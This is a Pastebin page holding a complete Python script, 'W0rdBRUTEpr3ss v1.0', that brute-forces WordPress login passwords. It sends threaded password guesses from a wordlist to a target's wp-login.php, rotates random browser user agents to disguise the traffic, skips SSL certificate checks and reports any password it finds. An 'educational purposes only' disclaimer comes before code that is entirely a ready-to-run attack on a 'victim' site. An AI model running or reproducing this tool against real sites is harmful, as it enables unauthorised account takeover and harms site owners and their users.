Googleinurl

[SCRIPT] W0rdBRUTEpr3ss v1.0

Dec 11th, 2014
1,094
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. #
  3. # WordPress Brute Force by Claudio Viviani
  4. #
  5. # Inspired by xSecurity's WordPress Brute Muliththreading
  6. #
  7. # Tested on Wordpress 3.x and 4.x
  8. #
  9. # Disclaimer:
  10. #
  11. # This exploit is intended for educational purposes only and the author
  12. # can not be held liable for any kind of damages done whatsoever to your machine,
  13. # or damages caused by some other,creative application of this exploit.
  14. # In any case you disagree with the above statement,stop here.
  15. #
  16. # Requirements:
  17. #
  18. # 1) python's httplib2 lib
  19. #    Installation: pip install httplib2
  20. #
  21. # Features:
  22. #
  23. # 1) Multithreading
  24. # 2) http and https protocols
  25. # 3) Random User Agent
  26.  
  27. import urllib, httplib, httplib2
  28. import socket, sys, os, os.path, optparse, random
  29. from threading import Thread
  30. from time import sleep
  31.  
  32. banner = """
  33.  ___ ___               __                                          
  34. |   Y   .-----.----.--|  .-----.----.-----.-----.-----.            
  35. |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|            
  36. |. / \ |_____|__| |_____|   __|__| |_____|_____|_____|            
  37. |:      |                |__|                                      
  38. |::.|:. |                                                          
  39. `--- ---'                                                          
  40.        _______            __         _______                      
  41.       |   _   .----.--.--|  |_.-----|   _   .-----.----.----.-----.
  42.       |.  1   |   _|  |  |   _|  -__|.  1___|  _  |   _|  __|  -__|
  43.       |.  _   |__| |_____|____|_____|.  __) |_____|__| |____|_____|
  44.       |:  1    \                   |:  |                          
  45.       |::.. .  /                    |::.|                          
  46.       `-------'                     `---'                          
  47.  
  48.                                        W0rdBRUTEpr3ss v1.0
  49.  
  50.                         Written by:
  51.  
  52.                       Claudio Viviani
  53.  
  54.                    http://www.homelab.it
  55.  
  56.                       info@homelab.it
  57.                   homelabit@protonmail.ch
  58.  
  59.               https://www.facebook.com/homelabit
  60.                 https://twitter.com/homelabit
  61.               https://plus.google.com/+HomelabIt1/
  62.     https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  63. """
  64. def randomAgentGen():
  65.  
  66.  userAgent =    ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  67.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  68.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
  69.                 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  70.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  71.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  72.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
  73.                 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  74.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
  75.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
  76.                 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  77.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0',
  78.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  79.                 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  80.                 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  81.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  82.                 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
  83.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  84.                 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
  85.                 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  86.                 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  87.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  88.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  89.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  90.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
  91.                 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  92.                 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  93.                 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  94.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  95.                 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  96.                 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
  97.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4',
  98.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2',
  99.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46',
  100.                 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
  101.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  102.                 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
  103.                 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  104.                 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  105.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
  106.                 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
  107.                 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  108.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
  109.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36',
  110.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
  111.                 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
  112.                 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
  113.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  114.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  115.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
  116.                 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
  117.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
  118.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
  119.                 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  120.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
  121.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0',
  122.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',
  123.                 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  124.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0',
  125.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
  126.                 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
  127.                 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
  128.                 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  129.                 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  130.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
  131.                 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  132.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  133.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
  134.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  135.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0',
  136.                 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
  137.                 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36',
  138.                 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  139.                 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  140.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  141.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
  142.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
  143.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
  144.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
  145.  
  146.  UA = random.choice(userAgent)
  147.  return UA
  148.  
  149. def urlCMS(url):
  150.     if url[:8] != "https://" and url[:7] != "http://":
  151.         print('[X] You must insert http:// or https:// procotol')
  152.         os._exit(1)
  153.     # Page login
  154.     url = url+'/wp-login.php'
  155.     return url
  156.  
  157. def bodyCMS(username,pwd):
  158.     body = { 'log':username,
  159.     'pwd':pwd,
  160.     'wp-submit':'Login',
  161.     'testcookie':'1' }
  162.     return body
  163.  
  164.  
  165. def headersCMS(UA):
  166.     headers = { 'User-Agent': UA,
  167.                 'Content-type': 'application/x-www-form-urlencoded',
  168.                 'Cookie': 'wordpress_test_cookie=WP+Cookie+check' }
  169.     return headers
  170.  
  171. def responseCMS(response):
  172.     if response['set-cookie'].split(" ")[-1] == "httponly":
  173.         return "1"
  174.  
  175. def connection(url,user,password,UA,timeout):
  176.  
  177.     username = user
  178.     pwd = password
  179.  
  180.     http = httplib2.Http(timeout=timeout, disable_ssl_certificate_validation=True)
  181.    
  182.     # HTTP POST Data
  183.     body = bodyCMS(username,pwd)
  184.  
  185.     # Headers
  186.     headers = headersCMS(UA)
  187.  
  188.     try:
  189.         response, content = http.request(url, 'POST', headers=headers, body=urllib.urlencode(body))
  190.  
  191.         if str(response.status)[0] == "4" or str(response.status)[0] == "5":
  192.             print('\n[X] HTTP error, code: '+str(response.status))
  193.             os._exit(1)
  194.  
  195.         if responseCMS(response) == "1":
  196.             print('\n')
  197.             print('[!] Password FOUND!!!')
  198.             print('')
  199.             print('[!] Username: '+user+' Password: '+password)
  200.             os._exit(0)
  201.  
  202.     except socket.timeout:
  203.         print('\n[X] Connection Timeout')
  204.         os._exit(1)
  205.     except socket.error:
  206.          print('\n[X] Connection Refused')
  207.          os._exit(1)
  208.     except httplib.ResponseNotReady:
  209.         print('\n[X] Server Not Responding')
  210.         os._exit(1)
  211.     except httplib2.ServerNotFoundError:
  212.         print('\n[X] Server Not Found')
  213.         os._exit(1)
  214.     except httplib2.HttpLib2Error:
  215.         print('\n[X] Connection Error!!')
  216.         os._exit(1)
  217.  
  218. commandList = optparse.OptionParser('usage: %prog -t TARGET_URL -u USER -w WORDLIST_FILE [-p PORT] [--timeout sec]\n')
  219. commandList.add_option('-t', '--target',
  220.                   action="store",
  221.                   help="Insert URL: http[s]://www.victim.com",
  222.                   )
  223. commandList.add_option('-u', '--username',
  224.                   action="store",
  225.                   help="Insert username",
  226.                   )
  227.  
  228. commandList.add_option('-w', '--wordfilelist',
  229.                   action="store",
  230.                   help="Insert wordlist files",
  231.                   )
  232. commandList.add_option('-p', '--port',
  233.                   action="store",
  234.                   default=0,
  235.                   type="int",
  236.                   help="[Insert Port Number] - Default 80 or 443",
  237.                   )
  238. commandList.add_option('--timeout',
  239.                   action="store",
  240.                   default=10,
  241.                   type="int",
  242.                   help="[Timeout Value] - Default 10",
  243.                   )
  244.  
  245. options, remainder = commandList.parse_args()
  246.  
  247. # Check args
  248. if not options.target or not options.username or not options.wordfilelist:
  249.     print(banner)
  250.     print
  251.     commandList.print_help()
  252.     sys.exit(1)
  253.  
  254. # args to vars
  255. url = options.target
  256. user = options.username
  257. password = options.wordfilelist
  258. timeout = options.timeout
  259.  
  260.  
  261. # Check if Wordlist file exists and has readable
  262. if not os.path.isfile(password) and not os.access(password, os.R_OK):
  263.     print "[X] Wordlist file is missing or is not readable"
  264.     sys.exit(1)
  265.  
  266. # Open and read Wordlist file
  267. wordlist = open(password).read().split("\n")
  268. # Total lines (password) in Wordlist file
  269. totalwordlist = len(wordlist)
  270. # Gen Random UserAgent
  271. UA  = randomAgentGen()
  272. # Url to url+login_cms_page
  273. url = urlCMS(url)
  274.  
  275. print(banner)
  276. print
  277. print('[+] Target.....: '+options.target)
  278. print('[+] Wordlist...: '+str(totalwordlist))
  279. print('[+] Username...: '+user)
  280. print('[+]')
  281. print('[+] Connecting.......')
  282. print('[+]')
  283.  
  284. # Reset var for "progress bar"
  285. count = 0
  286.  
  287. threads = []
  288. for pwd in wordlist:
  289.     count += 1
  290.     t = Thread(target=connection, args=(url,user,pwd,UA,timeout))
  291.     t.start()
  292.     threads.append(t)
  293.     sys.stdout.write('\r')
  294.     sys.stdout.write('[+] Password checked: '+str(count)+'/'+str(totalwordlist))
  295.     sys.stdout.flush()
  296.     sleep(0.210)
  297.  
  298. for a in threads:
  299.     a.join()
  300.  
  301. # no passwords found
  302. print('\n[X] Password NOT found :(')
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×